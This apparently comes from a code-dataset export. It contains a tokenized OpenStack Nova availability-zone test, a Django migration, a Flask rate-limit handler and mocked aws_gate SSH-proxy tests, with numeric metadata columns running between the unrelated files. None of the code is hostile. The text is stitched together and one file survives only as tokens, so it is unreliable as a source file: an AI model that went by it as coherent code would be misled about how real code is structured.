op|','
name|'six'
op|'.'
name|'text_type'
op|')'
newline|'\n'
name|'cached_key'
op|'='
name|'az'
op|'.'
name|'_make_cache_key'
op|'('
name|'services'
op|'['
number|'0'
op|']'
op|'['
string|"'host'"
op|']'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertIsInstance'
op|'('
name|'cached_key'
op|','
name|'str'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'_destroy_service'
op|'('
name|'service'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_set_availability_zone_not_compute_service
dedent|''
name|'def'
name|'test_set_availability_zone_not_compute_service'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
string|'"""Test not compute service get right availability zone."""'
newline|'\n'
name|'service'
op|'='
name|'self'
op|'.'
name|'_create_service_with_topic'
op|'('
string|"'network'"
op|','
name|'self'
op|'.'
name|'host'
op|')'
newline|'\n'
name|'services'
op|'='
name|'db'
op|'.'
name|'service_get_all'
op|'('
name|'self'
op|'.'
name|'context'
op|')'
newline|'\n'
name|'new_service'
op|'='
name|'az'
op|'.'
name|'set_availability_zones'
op|'('
name|'self'
op|'.'
name|'context'
op|','
name|'services'
op|')'
op|'['
number|'0'
op|']'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'self'
op|'.'
name|'default_in_az'
op|','
name|'new_service'
op|'['
string|"'availability_zone'"
op|']'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'_destroy_service'
op|'('
name|'service'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_get_host_availability_zone
dedent|''
name|'def'
name|'test_get_host_availability_zone'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
string|'"""Test get right availability zone by given host."""'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'self'
op|'.'
name|'default_az'
op|','
nl|'\n'
name|'az'
op|'.'
name|'get_host_availability_zone'
op|'('
name|'self'
op|'.'
name|'context'
op|','
name|'self'
op|'.'
name|'host'
op|')'
op|')'
newline|'\n'
nl|'\n'
name|'service'
op|'='
name|'self'
op|'.'
name|'_create_service_with_topic'
op|'('
string|"'compute'"
op|','
name|'self'
op|'.'
name|'host'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'_add_to_aggregate'
op|'('
name|'service'
op|','
name|'self'
op|'.'
name|'agg'
op|')'
newline|'\n'
nl|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'self'
op|'.'
name|'availability_zone'
op|','
nl|'\n'
name|'az'
op|'.'
name|'get_host_availability_zone'
op|'('
name|'self'
op|'.'
name|'context'
op|','
name|'self'
op|'.'
name|'host'
op|')'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_update_host_availability_zone
dedent|''
name|'def'
name|'test_update_host_availability_zone'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
string|'"""Test availability zone could be update by given host."""'
newline|'\n'
name|'service'
op|'='
name|'self'
op|'.'
name|'_create_service_with_topic'
op|'('
string|"'compute'"
op|','
name|'self'
op|'.'
name|'host'
op|')'
newline|'\n'
nl|'\n'
comment|'# Create a new aggregate with an AZ and add the host to the AZ'
nl|'\n'
name|'az_name'
op|'='
string|"'az1'"
newline|'\n'
name|'agg_az1'
op|'='
name|'self'
op|'.'
name|'_create_az'
op|'('
string|"'agg-az1'"
op|','
name|'az_name'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'_add_to_aggregate'
op|'('
name|'service'
op|','
name|'agg_az1'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'az_name'
op|','
nl|'\n'
name|'az'
op|'.'
name|'get_host_availability_zone'
op|'('
name|'self'
op|'.'
name|'context'
op|','
name|'self'
op|'.'
name|'host'
op|')'
op|')'
newline|'\n'
comment|'# Update AZ'
nl|'\n'
name|'new_az_name'
op|'='
string|"'az2'"
newline|'\n'
name|'self'
op|'.'
name|'_update_az'
op|'('
name|'agg_az1'
op|','
name|'new_az_name'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'new_az_name'
op|','
nl|'\n'
name|'az'
op|'.'
name|'get_host_availability_zone'
op|'('
name|'self'
op|'.'
name|'context'
op|','
name|'self'
op|'.'
name|'host'
op|')'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_delete_host_availability_zone
dedent|''
name|'def'
name|'test_delete_host_availability_zone'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
string|'"""Test availability zone could be deleted successfully."""'
newline|'\n'
name|'service'
op|'='
name|'self'
op|'.'
name|'_create_service_with_topic'
op|'('
string|"'compute'"
op|','
name|'self'
op|'.'
name|'host'
op|')'
newline|'\n'
nl|'\n'
comment|'# Create a new aggregate with an AZ and add the host to the AZ'
nl|'\n'
name|'az_name'
op|'='
string|"'az1'"
newline|'\n'
name|'agg_az1'
op|'='
name|'self'
op|'.'
name|'_create_az'
op|'('
string|"'agg-az1'"
op|','
name|'az_name'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'_add_to_aggregate'
op|'('
name|'service'
op|','
name|'agg_az1'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'az_name'
op|','
nl|'\n'
name|'az'
op|'.'
name|'get_host_availability_zone'
op|'('
name|'self'
op|'.'
name|'context'
op|','
name|'self'
op|'.'
name|'host'
op|')'
op|')'
newline|'\n'
comment|'# Delete the AZ via deleting the aggregate'
nl|'\n'
name|'self'
op|'.'
name|'_delete_from_aggregate'
op|'('
name|'service'
op|','
name|'agg_az1'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'self'
op|'.'
name|'default_az'
op|','
nl|'\n'
name|'az'
op|'.'
name|'get_host_availability_zone'
op|'('
name|'self'
op|'.'
name|'context'
op|','
name|'self'
op|'.'
name|'host'
op|')'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_get_availability_zones
dedent|''
name|'def'
name|'test_get_availability_zones'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
string|'"""Test get_availability_zones."""'
newline|'\n'
nl|'\n'
comment|'# When the param get_only_available of get_availability_zones is set'
nl|'\n'
comment|'# to default False, it returns two lists, zones with at least one'
nl|'\n'
comment|'# enabled services, and zones with no enabled services,'
nl|'\n'
comment|'# when get_only_available is set to True, only return a list of zones'
nl|'\n'
comment|'# with at least one enabled services.'
nl|'\n'
comment|'# Use the following test data:'
nl|'\n'
comment|'#'
nl|'\n'
comment|'# zone host enabled'
nl|'\n'
comment|'# nova-test host1 Yes'
nl|'\n'
comment|'# nova-test host2 No'
nl|'\n'
comment|'# nova-test2 host3 Yes'
nl|'\n'
comment|'# nova-test3 host4 No'
nl|'\n'
comment|'# <default> host5 No'
nl|'\n'
nl|'\n'
name|'agg2'
op|'='
name|'self'
op|'.'
name|'_create_az'
op|'('
string|"'agg-az2'"
op|','
string|"'nova-test2'"
op|')'
newline|'\n'
name|'agg3'
op|'='
name|'self'
op|'.'
name|'_create_az'
op|'('
string|"'agg-az3'"
op|','
string|"'nova-test3'"
op|')'
newline|'\n'
nl|'\n'
name|'service1'
op|'='
name|'self'
op|'.'
name|'_create_service_with_topic'
op|'('
string|"'compute'"
op|','
string|"'host1'"
op|','
nl|'\n'
name|'disabled'
op|'='
name|'False'
op|')'
newline|'\n'
name|'service2'
op|'='
name|'self'
op|'.'
name|'_create_service_with_topic'
op|'('
string|"'compute'"
op|','
string|"'host2'"
op|','
nl|'\n'
name|'disabled'
op|'='
name|'True'
op|')'
newline|'\n'
name|'service3'
op|'='
name|'self'
op|'.'
name|'_create_service_with_topic'
op|'('
string|"'compute'"
op|','
string|"'host3'"
op|','
nl|'\n'
name|'disabled'
op|'='
name|'False'
op|')'
newline|'\n'
name|'service4'
op|'='
name|'self'
op|'.'
name|'_create_service_with_topic'
op|'('
string|"'compute'"
op|','
string|"'host4'"
op|','
nl|'\n'
name|'disabled'
op|'='
name|'True'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'_create_service_with_topic'
op|'('
string|"'compute'"
op|','
string|"'host5'"
op|','
nl|'\n'
name|'disabled'
op|'='
name|'True'
op|')'
newline|'\n'
nl|'\n'
name|'self'
op|'.'
name|'_add_to_aggregate'
op|'('
name|'service1'
op|','
name|'self'
op|'.'
name|'agg'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'_add_to_aggregate'
op|'('
name|'service2'
op|','
name|'self'
op|'.'
name|'agg'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'_add_to_aggregate'
op|'('
name|'service3'
op|','
name|'agg2'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'_add_to_aggregate'
op|'('
name|'service4'
op|','
name|'agg3'
op|')'
newline|'\n'
nl|'\n'
name|'zones'
op|','
name|'not_zones'
op|'='
name|'az'
op|'.'
name|'get_availability_zones'
op|'('
name|'self'
op|'.'
name|'context'
op|')'
newline|'\n'
nl|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
op|'['
string|"'nova-test'"
op|','
string|"'nova-test2'"
op|']'
op|','
name|'zones'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
op|'['
string|"'nova-test3'"
op|','
string|"'nova'"
op|']'
op|','
name|'not_zones'
op|')'
newline|'\n'
nl|'\n'
name|'zones'
op|'='
name|'az'
op|'.'
name|'get_availability_zones'
op|'('
name|'self'
op|'.'
name|'context'
op|','
name|'True'
op|')'
newline|'\n'
nl|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
op|'['
string|"'nova-test'"
op|','
string|"'nova-test2'"
op|']'
op|','
name|'zones'
op|')'
newline|'\n'
nl|'\n'
name|'zones'
op|','
name|'not_zones'
op|'='
name|'az'
op|'.'
name|'get_availability_zones'
op|'('
name|'self'
op|'.'
name|'context'
op|','
nl|'\n'
name|'with_hosts'
op|'='
name|'True'
op|')'
newline|'\n'
nl|'\n'
name|'self'
op|'.'
name|'assertJsonEqual'
op|'('
name|'zones'
op|','
nl|'\n'
op|'['
op|'('
string|"u'nova-test2'"
op|','
name|'set'
op|'('
op|'['
string|"u'host3'"
op|']'
op|')'
op|')'
op|','
nl|'\n'
op|'('
string|"u'nova-test'"
op|','
name|'set'
op|'('
op|'['
string|"u'host1'"
op|']'
op|')'
op|')'
op|']'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertJsonEqual'
op|'('
name|'not_zones'
op|','
nl|'\n'
op|'['
op|'('
string|"u'nova-test3'"
op|','
name|'set'
op|'('
op|'['
string|"u'host4'"
op|']'
op|')'
op|')'
op|','
nl|'\n'
op|'('
string|"u'nova'"
op|','
name|'set'
op|'('
op|'['
string|"u'host5'"
op|']'
op|')'
op|')'
op|']'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_get_instance_availability_zone_default_value
dedent|''
name|'def'
name|'test_get_instance_availability_zone_default_value'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
string|'"""Test get right availability zone by given an instance."""'
newline|'\n'
name|'fake_inst'
op|'='
name|'objects'
op|'.'
name|'Instance'
op|'('
name|'host'
op|'='
name|'self'
op|'.'
name|'host'
op|','
nl|'\n'
name|'availability_zone'
op|'='
name|'None'
op|')'
newline|'\n'
nl|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'self'
op|'.'
name|'default_az'
op|','
nl|'\n'
name|'az'
op|'.'
name|'get_instance_availability_zone'
op|'('
name|'self'
op|'.'
name|'context'
op|','
name|'fake_inst'
op|')'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_get_instance_availability_zone_from_aggregate
dedent|''
name|'def'
name|'test_get_instance_availability_zone_from_aggregate'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
string|'"""Test get availability zone from aggregate by given an instance."""'
newline|'\n'
name|'host'
op|'='
string|"'host170'"
newline|'\n'
name|'service'
op|'='
name|'self'
op|'.'
name|'_create_service_with_topic'
op|'('
string|"'compute'"
op|','
name|'host'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'_add_to_aggregate'
op|'('
name|'service'
op|','
name|'self'
op|'.'
name|'agg'
op|')'
newline|'\n'
nl|'\n'
name|'fake_inst'
op|'='
name|'objects'
op|'.'
name|'Instance'
op|'('
name|'host'
op|'='
name|'host'
op|','
nl|'\n'
name|'availability_zone'
op|'='
name|'self'
op|'.'
name|'availability_zone'
op|')'
newline|'\n'
nl|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'self'
op|'.'
name|'availability_zone'
op|','
nl|'\n'
name|'az'
op|'.'
name|'get_instance_availability_zone'
op|'('
name|'self'
op|'.'
name|'context'
op|','
name|'fake_inst'
op|')'
op|')'
newline|'\n'
nl|'\n'
dedent|''
op|'@'
name|'mock'
op|'.'
name|'patch'
op|'.'
name|'object'
op|'('
name|'az'
op|'.'
name|'_get_cache'
op|'('
op|')'
op|','
string|"'get'"
op|')'
newline|'\n'
DECL|member|test_get_instance_availability_zone_cache_differs
name|'def'
name|'test_get_instance_availability_zone_cache_differs'
op|'('
name|'self'
op|','
name|'cache_get'
op|')'
op|':'
newline|'\n'
indent|' '
name|'host'
op|'='
string|"'host170'"
newline|'\n'
name|'service'
op|'='
name|'self'
op|'.'
name|'_create_service_with_topic'
op|'('
string|"'compute'"
op|','
name|'host'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'_add_to_aggregate'
op|'('
name|'service'
op|','
name|'self'
op|'.'
name|'agg'
op|')'
newline|'\n'
name|'cache_get'
op|'.'
name|'return_value'
op|'='
name|'self'
op|'.'
name|'default_az'
newline|'\n'
nl|'\n'
name|'fake_inst'
op|'='
name|'objects'
op|'.'
name|'Instance'
op|'('
name|'host'
op|'='
name|'host'
op|','
nl|'\n'
name|'availability_zone'
op|'='
name|'self'
op|'.'
name|'availability_zone'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
nl|'\n'
name|'self'
op|'.'
name|'availability_zone'
op|','
nl|'\n'
name|'az'
op|'.'
name|'get_instance_availability_zone'
op|'('
name|'self'
op|'.'
name|'context'
op|','
name|'fake_inst'
op|')'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_get_instance_availability_zone_no_host
dedent|''
name|'def'
name|'test_get_instance_availability_zone_no_host'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
string|'"""Test get availability zone from instance if host not set."""'
newline|'\n'
name|'fake_inst'
op|'='
name|'objects'
op|'.'
name|'Instance'
op|'('
name|'host'
op|'='
name|'None'
op|','
name|'availability_zone'
op|'='
string|"'inst-az'"
op|')'
newline|'\n'
nl|'\n'
name|'result'
op|'='
name|'az'
op|'.'
name|'get_instance_availability_zone'
op|'('
name|'self'
op|'.'
name|'context'
op|','
name|'fake_inst'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
string|"'inst-az'"
op|','
name|'result'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_get_instance_availability_zone_no_host_no_az
dedent|''
name|'def'
name|'test_get_instance_availability_zone_no_host_no_az'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
string|'"""Test get availability zone if neither host nor az is set."""'
newline|'\n'
name|'fake_inst'
op|'='
name|'objects'
op|'.'
name|'Instance'
op|'('
name|'host'
op|'='
name|'None'
op|','
name|'availability_zone'
op|'='
name|'None'
op|')'
newline|'\n'
nl|'\n'
name|'result'
op|'='
name|'az'
op|'.'
name|'get_instance_availability_zone'
op|'('
name|'self'
op|'.'
name|'context'
op|','
name|'fake_inst'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertIsNone'
op|'('
name|'result'
op|')'
newline|'\n'
dedent|''
dedent|''
endmarker|''
end_unit
| 13.175156
| 88
| 0.618644
| 3,802
| 25,349
| 3.996581
| 0.055497
| 0.176505
| 0.103982
| 0.129911
| 0.857124
| 0.813425
| 0.773215
| 0.739651
| 0.692596
| 0.645081
| 0
| 0.003241
| 0.099333
| 25,349
| 1,923
| 89
| 13.182007
| 0.662301
| 0
| 0
| 0.931877
| 0
| 0
| 0.396623
| 0.069431
| 0
| 0
| 0
| 0
| 0.012481
| 0
| null | null | 0
| 0.00416
| null | null | 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
c059d2f185b5dafc600d8726e5c78f2a679dd8ad
| 71
|
py
|
Python
|
command/test/integration/fake_repository/commit_005/a.py
|
s-pace/pyre-check
|
2b71dcf22e4672567cfe0dfef356f11646d66244
|
[
"MIT"
] | 5
|
2019-02-14T19:46:47.000Z
|
2020-01-16T05:48:45.000Z
|
command/test/integration/fake_repository/commit_005/a.py
|
s-pace/pyre-check
|
2b71dcf22e4672567cfe0dfef356f11646d66244
|
[
"MIT"
] | 4
|
2022-02-15T02:42:33.000Z
|
2022-02-28T01:30:07.000Z
|
command/test/integration/fake_repository/commit_005/a.py
|
s-pace/pyre-check
|
2b71dcf22e4672567cfe0dfef356f11646d66244
|
[
"MIT"
] | 2
|
2019-02-14T19:46:23.000Z
|
2020-07-13T03:53:04.000Z
|
#!/usr/bin/env python3
import b
def foo() -> int:
return b.bar()
| 10.142857
| 22
| 0.591549
| 12
| 71
| 3.5
| 0.916667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.018182
| 0.225352
| 71
| 6
| 23
| 11.833333
| 0.745455
| 0.295775
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| true
| 0
| 0.333333
| 0.333333
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 1
| 1
| 0
|
0
| 7
|
2215a0a692e7097758940c570b8c3679dbb7ce6e
| 5,315
|
py
|
Python
|
blogs/migrations/0007_auto_20210828_0834.py
|
zain-Z/humimp
|
fd7e4e211dce62639e2fce2dd9f9506240a7a3d9
|
[
"MIT"
] | null | null | null |
blogs/migrations/0007_auto_20210828_0834.py
|
zain-Z/humimp
|
fd7e4e211dce62639e2fce2dd9f9506240a7a3d9
|
[
"MIT"
] | null | null | null |
blogs/migrations/0007_auto_20210828_0834.py
|
zain-Z/humimp
|
fd7e4e211dce62639e2fce2dd9f9506240a7a3d9
|
[
"MIT"
] | null | null | null |
# Generated by Django 3.0.6 on 2021-08-28 06:34
import blogs.validators
import datetime
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('blogs', '0006_auto_20210825_1547'),
]
operations = [
migrations.AlterField(
model_name='blog',
name='blogs_date',
field=models.DateField(blank=True, default=datetime.date.today),
),
migrations.AlterField(
model_name='blog',
name='blogs_desc',
field=models.CharField(blank=True, default='', max_length=300),
),
migrations.AlterField(
model_name='blog',
name='blogs_image',
field=models.FileField(blank=True, default='', upload_to='background/blogs/', validators=[blogs.validators.validate_image_extension]),
),
migrations.AlterField(
model_name='blog',
name='blogs_location',
field=models.CharField(blank=True, default='', max_length=300),
),
migrations.AlterField(
model_name='storyandblog',
name='image_bg_blogs',
field=models.FileField(blank=True, default='', upload_to='background/stories_and_blogs/', validators=[blogs.validators.validate_image_extension]),
),
migrations.AlterField(
model_name='storyandblog',
name='image_bg_stories',
field=models.FileField(blank=True, default='', upload_to='background/stories_and_blogs/', validators=[blogs.validators.validate_image_extension]),
),
migrations.AlterField(
model_name='storyandblog',
name='text_bg_blogs',
field=models.CharField(blank=True, default='', max_length=300),
),
migrations.AlterField(
model_name='storyandblog',
name='text_bg_stories',
field=models.CharField(blank=True, default='', max_length=300),
),
migrations.AlterField(
model_name='storydetail',
name='story_date',
field=models.DateField(blank=True, default=datetime.date.today),
),
migrations.AlterField(
model_name='storydetail',
name='story_desc1',
field=models.CharField(blank=True, default='', max_length=300),
),
migrations.AlterField(
model_name='storydetail',
name='story_desc2',
field=models.CharField(blank=True, default='', max_length=300),
),
migrations.AlterField(
model_name='storydetail',
name='story_desc3',
field=models.CharField(blank=True, default='', max_length=300),
),
migrations.AlterField(
model_name='storydetail',
name='story_desc4',
field=models.CharField(blank=True, default='', max_length=300),
),
migrations.AlterField(
model_name='storydetail',
name='story_desc5',
field=models.CharField(blank=True, default='', max_length=300),
),
migrations.AlterField(
model_name='storydetail',
name='story_desc6',
field=models.CharField(blank=True, default='', max_length=300),
),
migrations.AlterField(
model_name='storydetail',
name='story_desc7',
field=models.CharField(blank=True, default='', max_length=300),
),
migrations.AlterField(
model_name='storydetail',
name='story_image_one',
field=models.FileField(blank=True, default='', upload_to='background/stories_detail/', validators=[blogs.validators.validate_image_extension]),
),
migrations.AlterField(
model_name='storydetail',
name='story_image_three',
field=models.FileField(blank=True, default='', upload_to='background/stories_detail/', validators=[blogs.validators.validate_image_extension]),
),
migrations.AlterField(
model_name='storydetail',
name='story_image_two',
field=models.FileField(blank=True, default='', upload_to='background/stories_detail/', validators=[blogs.validators.validate_image_extension]),
),
migrations.AlterField(
model_name='storydetail',
name='story_location',
field=models.CharField(blank=True, default='', max_length=300),
),
migrations.AlterField(
model_name='storydetail',
name='story_name',
field=models.CharField(blank=True, default='', max_length=300),
),
migrations.AlterField(
model_name='team',
name='teams_desc',
field=models.CharField(blank=True, default='', max_length=300),
),
migrations.AlterField(
model_name='team',
name='teams_image',
field=models.FileField(blank=True, default='', upload_to='background/team/', validators=[blogs.validators.validate_image_extension]),
),
migrations.AlterField(
model_name='team',
name='teams_name',
field=models.CharField(blank=True, default='', max_length=300),
),
]
| 39.080882
| 158
| 0.595861
| 505
| 5,315
| 6.071287
| 0.142574
| 0.156556
| 0.195695
| 0.227006
| 0.916177
| 0.916177
| 0.916177
| 0.878995
| 0.868885
| 0.868885
| 0
| 0.021637
| 0.278269
| 5,315
| 135
| 159
| 39.37037
| 0.777633
| 0.008467
| 0
| 0.728682
| 1
| 0
| 0.134396
| 0.030182
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.023256
| 0
| 0.046512
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
2246a564d58ca90cd85ef9d55725cd62710f98c4
| 188
|
py
|
Python
|
app/routes/errors.py
|
zalando-zmon/zmon-slo-metrics
|
f2e823b861af2f449d1fd72cced74cf26b3aee94
|
[
"Apache-2.0"
] | 8
|
2017-02-21T09:45:01.000Z
|
2020-09-18T00:09:42.000Z
|
app/routes/errors.py
|
ThorbjoernG/service-level-reporting
|
d9ec7dca3fee1614bf39cb46af9c0cc8bfbd805e
|
[
"Apache-2.0"
] | 148
|
2017-02-20T08:52:32.000Z
|
2020-03-10T09:43:40.000Z
|
app/routes/errors.py
|
lfroment0/service-level-reporting
|
29d6d0664762c76eb5aa7000a8c191c32cc2c015
|
[
"Apache-2.0"
] | 12
|
2017-02-20T07:24:21.000Z
|
2019-09-27T12:32:33.000Z
|
from flask import jsonify, make_response
def rate_limit_exceeded(e):
return make_response(jsonify(title='Rate limit exceeded', detail='Rate limit exceeded. Too many requests'), 429)
| 31.333333
| 116
| 0.781915
| 27
| 188
| 5.296296
| 0.666667
| 0.188811
| 0.356643
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.018293
| 0.12766
| 188
| 5
| 117
| 37.6
| 0.853659
| 0
| 0
| 0
| 0
| 0
| 0.303191
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0
| 0.333333
| 0.333333
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 0
|
0
| 7
|
225011995916e16a3304b4fb6ec8c54eb071795f
| 5,196
|
py
|
Python
|
tests/unit/test_ssh_proxy.py
|
ckornacker/aws-gate
|
9c5b797986c5973d811d578161293a102dfdb51d
|
[
"BSD-3-Clause"
] | 369
|
2018-11-20T16:00:27.000Z
|
2022-03-30T21:36:41.000Z
|
tests/unit/test_ssh_proxy.py
|
ckornacker/aws-gate
|
9c5b797986c5973d811d578161293a102dfdb51d
|
[
"BSD-3-Clause"
] | 1,234
|
2018-11-19T00:02:38.000Z
|
2022-03-31T04:02:33.000Z
|
tests/unit/test_ssh_proxy.py
|
ckornacker/aws-gate
|
9c5b797986c5973d811d578161293a102dfdb51d
|
[
"BSD-3-Clause"
] | 35
|
2019-01-04T22:52:39.000Z
|
2022-03-30T21:36:43.000Z
|
import pytest
from aws_gate.ssh_proxy import SshProxySession, ssh_proxy
def test_create_ssh_proxy_session(ssm_mock, instance_id):
sess = SshProxySession(instance_id=instance_id, ssm=ssm_mock)
sess.create()
assert ssm_mock.start_session.called
def test_terminate_ssh_proxy_session(ssm_mock, instance_id):
sess = SshProxySession(instance_id=instance_id, ssm=ssm_mock)
sess.create()
sess.terminate()
assert ssm_mock.terminate_session.called
def test_open_ssh_proxy_session(mocker, instance_id, ssm_mock):
m = mocker.patch("aws_gate.session_common.execute_plugin", return_value="output")
sess = SshProxySession(instance_id=instance_id, ssm=ssm_mock)
sess.open()
assert m.called
def test_ssh_proxy_session_context_manager(ssm_mock, instance_id):
with SshProxySession(instance_id=instance_id, ssm=ssm_mock):
pass
assert ssm_mock.start_session.called
assert ssm_mock.terminate_session.called
def test_ssh_proxy_session(
mocker, instance_id, ssh_key, get_instance_details_response, config
):
mocker.patch("aws_gate.ssh_proxy.get_aws_client")
mocker.patch("aws_gate.ssh_proxy.get_aws_resource")
mocker.patch("aws_gate.ssh_proxy.query_instance", return_value=instance_id)
mocker.patch("aws_gate.ssh_proxy.SshKey", return_value=ssh_key)
mocker.patch("aws_gate.ssh_proxy.SshKeyUploader", return_value=mocker.MagicMock())
mocker.patch(
"aws_gate.ssh_proxy.get_instance_details",
return_value=get_instance_details_response,
)
session_mock = mocker.patch(
"aws_gate.ssh_proxy.SshProxySession", return_value=mocker.MagicMock()
)
mocker.patch("aws_gate.decorators.is_existing_profile", return_value=True)
mocker.patch("aws_gate.decorators._plugin_exists", return_value=True)
mocker.patch("aws_gate.decorators.execute_plugin", return_value="1.1.23.0")
ssh_proxy(
config=config,
instance_name=instance_id,
profile_name="default",
region_name="eu-west-1",
)
assert session_mock.called
def test_ssh_proxy_exception_invalid_profile(mocker, instance_id, ssh_key, config):
mocker.patch("aws_gate.ssh_proxy.get_aws_client")
mocker.patch("aws_gate.ssh_proxy.get_aws_resource")
mocker.patch("aws_gate.ssh_proxy.query_instance", return_value=instance_id)
mocker.patch("aws_gate.ssh_proxy.SshKey", return_value=ssh_key)
mocker.patch("aws_gate.decorators.is_existing_region", return_value=True)
mocker.patch("aws_gate.decorators._plugin_exists", return_value=True)
mocker.patch("aws_gate.decorators.execute_plugin", return_value="1.1.23.0")
with pytest.raises(ValueError):
ssh_proxy(
config=config,
profile_name="invalid-profile",
instance_name=instance_id,
region_name="eu-west-1",
)
def test_ssh_proxy_exception_invalid_region(mocker, instance_id, ssh_key, config):
mocker.patch("aws_gate.ssh_proxy.get_aws_client")
mocker.patch("aws_gate.ssh_proxy.get_aws_resource")
mocker.patch("aws_gate.ssh_proxy.query_instance", return_value=instance_id)
mocker.patch("aws_gate.ssh_proxy.SshKey", return_value=ssh_key)
mocker.patch("aws_gate.decorators.is_existing_profile", return_value=True)
mocker.patch("aws_gate.decorators._plugin_exists", return_value=True)
mocker.patch("aws_gate.decorators.execute_plugin", return_value="1.1.23.0")
with pytest.raises(ValueError):
ssh_proxy(
config=config,
region_name="invalid-region",
instance_name=instance_id,
profile_name="default",
)
def test_ssh_proxy_exception_unknown_instance_id(mocker, ssh_key, instance_id, config):
mocker.patch("aws_gate.ssh_proxy.get_aws_client")
mocker.patch("aws_gate.ssh_proxy.get_aws_resource")
mocker.patch("aws_gate.ssh_proxy.query_instance", return_value=None)
mocker.patch("aws_gate.ssh_proxy.SshKey", return_value=ssh_key)
mocker.patch("aws_gate.decorators._plugin_exists", return_value=True)
mocker.patch("aws_gate.decorators.execute_plugin", return_value="1.1.23.0")
mocker.patch("aws_gate.decorators.is_existing_profile", return_value=True)
mocker.patch("aws_gate.decorators.is_existing_region", return_value=True)
with pytest.raises(ValueError):
ssh_proxy(
config=config,
instance_name=instance_id,
profile_name="default",
region_name="eu-west-1",
)
def test_ssh_proxy_without_config(mocker, ssh_key, instance_id, empty_config):
mocker.patch("aws_gate.ssh_proxy.get_aws_client")
mocker.patch("aws_gate.ssh_proxy.get_aws_resource")
mocker.patch("aws_gate.ssh_proxy.query_instance", return_value=None)
mocker.patch("aws_gate.ssh_proxy.SshKey", return_value=ssh_key)
mocker.patch("aws_gate.decorators._plugin_exists", return_value=True)
mocker.patch("aws_gate.decorators.execute_plugin", return_value="1.1.23.0")
with pytest.raises(ValueError):
ssh_proxy(
config=empty_config,
instance_name=instance_id,
profile_name="default",
region_name="eu-west-1",
)
| 37.927007
| 87
| 0.739992
| 718
| 5,196
| 4.980501
| 0.094708
| 0.0783
| 0.152685
| 0.196309
